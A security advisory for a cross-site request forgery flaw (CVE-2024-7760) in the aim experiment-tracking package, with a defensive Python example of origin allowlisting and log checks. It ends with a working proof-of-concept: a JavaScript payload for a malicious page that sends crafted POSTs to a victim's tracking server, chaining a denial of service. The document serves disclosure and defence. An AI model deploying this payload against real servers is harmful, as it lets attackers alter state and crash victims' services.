Cross-site Request Forgery (CSRF) Affecting aim package, versions [0,]


Severity: medium

CVSS assessment made by Snyk's Security Team.

Threat Intelligence

  • Exploit Maturity: Proof of Concept
  • EPSS: 0.04% (10th percentile)

  • Snyk ID: SNYK-PYTHON-AIM-9637809
  • Published: 3 Apr 2025
  • Disclosed: 20 Mar 2025
  • Credit: patrik-ha

Introduced: 20 Mar 2025

CVE-2024-7760
CWE-352

How to fix?

There is no fixed version for aim.

Overview

aim is a super-easy way to record, search and compare AI experiments.

Affected versions of this package are vulnerable to Cross-site Request Forgery (CSRF) due to overly permissive CORS settings that allow cross-origin requests from all origins. An attacker can change the application's state by having the victim's browser, which is already authenticated to the application, send attacker-crafted requests to it.
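To make the mechanism concrete, the following is an added example (not aim's own code, and independent of whatever web framework aim's tracking server uses) that models the two settings side by side: a wildcard CORS policy that echoes back any Origin with credentials enabled, and an origin allowlist. It also carries the caveat a practitioner needs here: tightening the CORS response headers only stops a foreign page from reading responses. A cross-origin POST like the one in the PoC is sent with a text/plain body, needs no preflight, and still reaches the handler, so the server must additionally refuse state-changing requests whose Origin (or, failing that, Referer) is not on the allowlist. The allowlist value, the attacker host evil.example and the sample log lines are constructed for the example; the request paths are the ones from the PoC.

```python
"""Added example (not aim's own code): wildcard CORS vs. an origin allowlist,
and a server-side Origin check for state-changing requests.

The framework is abstracted away: requests are (method, headers) pairs and
policies are plain functions, so the decision logic can be read and tested
on its own. The allowlist, the attacker host and the log lines below are
constructed for this example."""

from urllib.parse import urlsplit

SAFE_METHODS = {"GET", "HEAD", "OPTIONS"}

# Constructed allowlist: the origin the tracking UI itself is served from.
ALLOWED_ORIGINS = {"http://127.0.0.1:53800"}


def site_of(url):
    """Reduce a URL to scheme://host[:port], the unit that CORS compares."""
    parts = urlsplit(url)
    if not parts.scheme or not parts.netloc:
        return None
    return f"{parts.scheme}://{parts.netloc}".lower()


def cors_headers(origin, allowed_origins=None):
    """Response headers for a request carrying the given Origin.

    allowed_origins=None models the weak setting the advisory describes:
    every origin is accepted and echoed back with credentials enabled, so any
    site can both send credentialed requests and read the responses. Passing
    a set models the fix: only listed origins get a CORS grant at all."""
    if allowed_origins is None:
        return {"Access-Control-Allow-Origin": origin or "*",
                "Access-Control-Allow-Credentials": "true"}
    if origin and origin.lower() in allowed_origins:
        return {"Access-Control-Allow-Origin": origin,
                "Access-Control-Allow-Credentials": "true",
                "Vary": "Origin"}
    return {}


def check_state_change(method, headers, allowed_origins):
    """Guard to run before any handler that mutates state.

    CORS headers alone do not stop a cross-site POST from reaching the
    handler (a text/plain body needs no preflight), so the server must look at
    where the request came from. Origin is authoritative; Referer is the
    fallback for same-origin requests where a browser omits Origin; a
    state-changing request with neither is refused."""
    if method.upper() in SAFE_METHODS:
        return True, "safe method"
    lower = {k.lower(): v for k, v in headers.items()}
    source = lower.get("origin")
    if not source and "referer" in lower:
        source = site_of(lower["referer"])
    if not source:
        return False, "no Origin or Referer on a state-changing request"
    if source.lower() in allowed_origins:
        return True, f"{source} is on the allowlist"
    return False, f"cross-origin {method.upper()} from {source} refused"


# Constructed access-log lines in a simple "METHOD PATH origin=VALUE" shape
# (not aim's real log format); "-" means the header was absent.
SAMPLE_LOG = """\
GET /tracking/client_1/get-resource origin=-
POST /tracking/client_1/get-resource origin=http://127.0.0.1:53800
POST /tracking/client_1/get-resource origin=http://evil.example
POST /tracking/client_1/read-instruction origin=http://evil.example
POST /tracking/client_1/read-instruction origin=-
"""


def find_cross_origin_writes(log_text, allowed_origins):
    """Replay the guard over logged requests to find the ones it would refuse.

    Useful as a detection pass over historical logs of a server that was
    running without the guard."""
    refused = []
    for line in log_text.splitlines():
        method, path, origin_field = line.split()
        origin = origin_field.split("=", 1)[1]
        headers = {} if origin == "-" else {"Origin": origin}
        ok, reason = check_state_change(method, headers, allowed_origins)
        if not ok:
            refused.append((method, path, reason))
    return refused


if __name__ == "__main__":
    attacker = "http://evil.example"
    print("wildcard policy:", cors_headers(attacker))
    print("allowlist policy:", cors_headers(attacker, ALLOWED_ORIGINS))
    for method, path, reason in find_cross_origin_writes(SAMPLE_LOG, ALLOWED_ORIGINS):
        print(f"refuse {method} {path}: {reason}")
```

Run as a script, the wildcard policy returns a grant for evil.example while the allowlist returns nothing, and the log replay flags the two POSTs from the foreign origin plus the POST that carried no Origin at all. The guard deliberately treats a missing Origin on a write as a refusal rather than a pass; non-browser clients that legitimately omit it are better served by an explicit token than by an exception in the origin check.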

PoC

  1. Start the tracking server by running the following commands:
aim init
aim server
  2. Host the following payload on a malicious website:
<script>
    const trackingServer = "http://x.x.x.x:53800/";
    const resourceEndpoint = "tracking/client_1/get-resource";
    const instructionEndpoint = "tracking/client_1/read-instruction";

    const req = new XMLHttpRequest();
    // This chains https://huntr.com/bounties/abcea7c6-bb3b-45e9-aa15-9eb6b224451a, causing
    // denial of service. But it could in practice chain any other existing vulnerability,
    // or just regular endpoint behaviour.

    req.open("POST", trackingServer + resourceEndpoint);
    req.send(JSON.stringify({
        "resource_handler": "my_resource",
        "resource_type": "Repo",
        "args": "AAAAAAABAAAABw=="
    }));

    // A bit lazy, just make sure to do this request *after* the first one is complete.
    setTimeout(() => {
        const req = new XMLHttpRequest();
        req.open("POST", trackingServer + instructionEndpoint);
        req.send(JSON.stringify({
            "resource_handler": "my_resource",
            "method_name": "from_path",
            "args": "AAAAAAABAAAABgoAAAD+AAAAAAAAAAD+ABQAAAAEYWltOi8vMC4wLjAuMDo1MzgwMA=="
        }));
    }, 1000)
</script>
  3. Visit the website from the machine running the tracking server.
